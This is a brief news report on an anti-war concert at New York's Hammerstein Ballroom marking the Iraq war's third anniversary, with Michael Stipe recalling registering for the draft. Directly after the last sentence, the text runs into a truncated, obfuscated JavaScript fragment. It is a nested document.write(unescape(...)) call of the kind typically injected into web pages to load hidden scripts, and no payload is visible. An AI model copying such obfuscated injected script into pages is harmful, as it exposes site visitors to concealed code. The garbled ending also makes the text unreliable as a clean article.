Michael Stipe, Bright Eyes and Peaches were among those taking part in a anti-war gig in New York.
The stars were joined by fellow performers Rufus Wainwright and Fischerspooner, while Moby, Public Enemy's Chuck D, Steve Earle and actress Susan Sarandon were among the famous faces present at the Bring 'Em Home gig held to mark the third anniversary of the current Iraqi war's start.
Dedicating his opening track, Joseph Arthur cover 'In The Sun', to anti-war veterans groups, Stipe told the Hammerstein Ballroom audience about his own fears of going to war when he faced the draft as a youth, BBC 6 Music reports.
"I never served myself. I did have the distinction of registering for the draft under (President) Carter," Stipe recalled. "And I will never forget sitting in the post office, signing my name at the bottom and hoping to God I wouldn't have to go."
An anti-war speaking tour across the US is now set to follow the concert.document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
